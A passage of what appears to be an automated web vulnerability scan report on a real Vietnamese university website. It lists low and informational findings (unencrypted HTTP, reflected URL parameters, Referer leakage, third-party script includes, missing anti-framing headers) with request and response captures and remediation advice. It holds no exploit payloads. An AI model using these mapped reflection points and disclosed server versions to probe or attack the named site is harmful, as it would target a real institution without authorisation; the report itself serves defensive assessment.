Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://www.google.com.vn/
Accept-Encoding: gzip, deflate
Accept-Language: vi,en;q=0.9
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
Set-Cookie: PHPSESSID=t96csosiqtlagp2pe45ir2rnb1; path=/
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:36:56 GMT
Connection: close
Content-Length: 50699

<!DOCTYPE html>
<html ng-app="">
<head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Rem
...[SNIP]...
4. Unencrypted communications
Previous  Next 

Summary

Severity:  Low
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /

Issue description

The application allows users to connect to it over unencrypted connections. An attacker suitably positioned to view a legitimate user's network traffic could record and monitor their interactions with the application and obtain any information the user supplies. Furthermore, an attacker able to modify traffic could use the application as a platform for attacks against its users and third-party websites. Unencrypted connections have been exploited by ISPs and governments to track users, and to inject adverts and malicious JavaScript. Due to these concerns, web browser vendors are planning to visually flag unencrypted connections as hazardous.
To exploit this vulnerability, an attacker must be suitably positioned to eavesdrop on the victim's network traffic. This scenario typically occurs when a client communicates with the server over an insecure connection such as public Wi-Fi, or a corporate or home network that is shared with a compromised computer. Common defenses such as switched networks are not sufficient to prevent this. An attacker situated in the user's ISP or the application's hosting infrastructure could also perform this attack. Note that an advanced adversary could potentially target any connection made over the Internet's core infrastructure.
Please note that using a mixture of encrypted and unencrypted communications is an ineffective defense against active attackers, because they can easily remove references to encrypted resources when these references are transmitted over an unencrypted connection.

Issue remediation

Applications should use transport-level encryption (SSL/TLS) to protect all communications passing between the client and the server. The Strict-Transport-Security HTTP header should be used to ensure that clients refuse to access the server over an insecure connection.

References

Vulnerability classifications

5. Input returned in response (reflected)
Previous  Next 

There are 8 instances of this issue:

Issue background

Reflection of input arises when data is copied from a request and echoed into the application's immediate response.
Input being returned in application responses is not a vulnerability in its own right. However, it is a prerequisite for many client-side vulnerabilities, including cross-site scripting, open redirection, content spoofing, and response header injection. Additionally, some server-side vulnerabilities such as SQL injection are often easier to identify and exploit when input is returned in responses. In applications where input retrieval is rare and the environment is resistant to automated testing (for example, due to a web application firewall), it might be worth subjecting instances of it to focused manual testing.

Vulnerability classifications



5.1. http://www.tgu.edu.vn/topic/ [11387 parameter]
Previous  Next 

Summary

Severity:  Information
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 11387 request parameter is copied into the application's response.

Request

GET /topic/?11387=bxn2v1b4gx HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=8hgqdfquccnug7lp9itk05d2t2;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:54:30 GMT
Connection: close
Content-Length: 16499

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11387=bxn2v1b4gx"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
5.2. http://www.tgu.edu.vn/topic/ [11408 parameter]
Previous  Next 

Summary

Severity:  Information
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 11408 request parameter is copied into the application's response.

Request

GET /topic/?11408=8x88big4w5 HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=t6tbq2c93ngipudm40emf5q9o7;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:52:04 GMT
Connection: close
Content-Length: 16897

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11408=8x88big4w5"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
5.3. http://www.tgu.edu.vn/topic/ [11526 parameter]
Previous  Next 

Summary

Severity:  Information
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 11526 request parameter is copied into the application's response.

Request

GET /topic/?11526=psxqhb3c98 HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=gerbkpeqs7b1ruioj2u5m1i0k6;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:55:37 GMT
Connection: close
Content-Length: 25824

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11526=psxqhb3c98"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
5.4. http://www.tgu.edu.vn/topic/ [11539 parameter]
Previous  Next 

Summary

Severity:  Information
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 11539 request parameter is copied into the application's response.

Request

GET /topic/?11539=g242uob752 HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=i336pgatekcsu1rjlqqrm8npn5;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:55:57 GMT
Connection: close
Content-Length: 36602

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11539=g242uob752"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
5.5. http://www.tgu.edu.vn/topic/ [11542 parameter]
Previous  Next 

Summary

Severity:  Information
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 11542 request parameter is copied into the application's response.

Request

GET /topic/?11542=l1lxe1vd92 HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=pu4sbkvs93q4posm0ci2b9t4t7;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:54:56 GMT
Connection: close
Content-Length: 23592

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11542=l1lxe1vd92"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
5.6. http://www.tgu.edu.vn/topic/ [11556 parameter]
Previous  Next 

Summary

Severity:  Information
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 11556 request parameter is copied into the application's response.

Request

GET /topic/?11556=fffhz6rd7x HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=ph64imi6u9t1hdnakjoclp0gn5;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:55:09 GMT
Connection: close
Content-Length: 27001

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11556=fffhz6rd7x"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
5.7. http://www.tgu.edu.vn/topic/ [8044 parameter]
Previous  Next 

Summary

Severity:  Information
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 8044 request parameter is copied into the application's response.

Request

GET /topic/?8044=0rj9recdob HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=dtqntjp4qof02c2mrhthnvhbp5;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 14:59:50 GMT
Connection: close
Content-Length: 16264

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?8044=0rj9recdob"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
5.8. http://www.tgu.edu.vn/topic/ [name of an arbitrarily supplied URL parameter]
Previous  Next 

Summary

Severity:  Information
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The name of an arbitrarily supplied URL parameter is copied into the application's response.

Request

GET /topic/?11408=&bxpfap9d8s=1 HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=t6tbq2c93ngipudm40emf5q9o7;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 14:10:29 GMT
Connection: close
Content-Length: 16900

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11408=&bxpfap9d8s=1"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-bor
...[SNIP]...
6. Cross-domain Referer leakage
Previous  Next 

Summary

Severity:  Information
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /

Issue detail

The application contains links to the following other domains from URLs containing a query string:
  • ajax.googleapis.com
  • netdna.bootstrapcdn.com
  • www.facebook.com
  • docs.google.com
  • dhtg.vpdttg.vn
  • mail.google.com
  • rmit.libguides.com
  • drive.google.com
  • nlv.gov.vn
  • thuviensachhochiminh.tphcm.gov.vn
  • tuyensinh.vied.vn
  • www.moet.gov.vn
  • www.vied.vn
  • vltiengiang.vieclamvietnam.gov.vn
  • vnpttiengiang.vn
  • www.doanhnhantiengianghcm.vn
  • www.esuhai.com
  • www.youtube.com
  • bachhoa24.com
  • scontent.fsgn5-2.fna.fbcdn.net
Numerous links to other domains were found and the above are a sample subset.

This issue was found in multiple locations under the reported path.

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behavior should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

Applications should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties. If placing sensitive information in the URL is unavoidable, consider using the Referer-Policy HTTP header to reduce the chance of it being disclosed to third parties.

References

Vulnerability classifications

Request 1

GET /topic/?11556= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=440ehrd3vr7uge6bmmovfq3kc2

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:44:59 GMT
Connection: close
Content-Length: 26991

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<![endif]-->
  
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
...[SNIP]...
<!-- Your share button code -->
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11556="
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-border-radius: 5px;
-moz-border-radius: 5px;
border-radius: 5px;
text-decoration: none;"
class="fb-share">

Chia s...
</a>
...[SNIP]...

Request 2

GET /topic/?11387= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=vajug7ptns97blqrojb6jrfdi1

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:42:40 GMT
Connection: close
Content-Length: 16489

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<div><iframe frameborder="0" src="http://docs.google.com/gview?url=http://tgu.edu.vn/upload/files/KQ_TH6.xlsx&amp;embedded=true" style="width: 100%; height: 700px;"></iframe>
...[SNIP]...

Request 3

GET /topics/?0.247.0.0= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=e6t9ucbd4hbcs274sfuhuronq7

Response 3

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:39:10 GMT
Connection: close
Content-Length: 26129

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<img src="/images/e-office.png"/><a href="http://dhtg.vpdttg.vn" target="_blank">V..n Ph..ng ..i...n t...</a>
...[SNIP]...
7. Cross-domain script include
Previous  Next 

There are 2 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. Applications that rely on third-party scripts should consider copying the contents of these scripts onto their own domain and including them from there. If that is not possible (e.g. for licensing reasons) then consider reimplementing the script's functionality within application code.

Vulnerability classifications



7.1. http://www.tgu.edu.vn/
Previous  Next 

Summary

Severity:  Information
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /

Issue detail

The response dynamically includes the following script from another domain:
  • https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js
This issue was found in multiple locations under the reported path.

Request 1

GET /topic/?11556= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=440ehrd3vr7uge6bmmovfq3kc2

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:44:59 GMT
Connection: close
Content-Length: 26991

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<![endif]-->
  
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
...[SNIP]...

Request 2

GET /topics/?0.247.0.0= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=e6t9ucbd4hbcs274sfuhuronq7

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:39:10 GMT
Connection: close
Content-Length: 26129

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<![endif]-->
  
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
...[SNIP]...

Request 3

GET /topic/?11387= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=vajug7ptns97blqrojb6jrfdi1

Response 3

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:42:40 GMT
Connection: close
Content-Length: 16489

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<![endif]-->
  
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
...[SNIP]...
7.2. http://www.tgu.edu.vn/dstt/
Previous 

Summary

Severity:  Information
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /dstt/

Issue detail

The response dynamically includes the following script from another domain:
  • https://code.jquery.com/jquery-1.12.4.min.js

Request 1

GET /dstt/ HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=gc1lt2o1pii04nm5kvp7ipnr56

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:43:36 GMT
Connection: close
Content-Length: 3462

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html ng-app="">

<head>
<meta http-equiv="content-type" content="text/
...[SNIP]...
</script>
<script src="https://code.jquery.com/jquery-1.12.4.min.js"></script>
...[SNIP]...
8. Frameable response (potential Clickjacking)
Previous  Next 

Summary

Severity:  Information
Confidence:  Firm
Host:  http://www.tgu.edu.vn
Path:  /

Issue detail

This issue was found in multiple locations under the reported path.

Issue background

If a page fails to set an appropriate X-Frame-Options or Content-Security-Policy HTTP header, it might be possible for a page controlled by an attacker to load it within an iframe. This may enable a clickjacking attack, in which the attacker's page overlays the target application's interface with a different interface provided by the attacker. By inducing victim users to perform actions such as mouse clicks and keystrokes, the attacker can cause them to unwittingly carry out actions within the application that is being targeted. This technique allows the attacker to circumvent defenses against cross-site request forgery, and may result in unauthorized actions.
Note that some applications attempt to prevent these attacks from within the HTML page itself, using "framebusting" code. However, this type of defense is normally ineffective and can usually be circumvented by a skilled attacker.
You should determine whether any functions accessible within frameable pages can be used by application users to perform any sensitive actions within the application.

Issue remediation

To effectively prevent framing attacks, the application should return a response header with the name X-Frame-Options and the value DENY to prevent framing altogether, or the value SAMEORIGIN to allow framing only by pages on the same origin as the response itself. Note that the SAMEORIGIN header can be partially bypassed if the application itself can be made to frame untrusted websites.

References

Vulnerability classifications

Request 1

GET /topic/?11556= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=440ehrd3vr7uge6bmmovfq3kc2

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:44:59 GMT
Connection: close
Content-Length: 26991

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...

Request 2

GET /topics/?0.247.0.0= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=e6t9ucbd4hbcs274sfuhuronq7

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:39:10 GMT
Connection: close
Content-Length: 26129

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...

Request 3

GET /topic/?11387= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=vajug7ptns97blqrojb6jrfdi1

Response 3

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:42:40 GMT
Connection: close
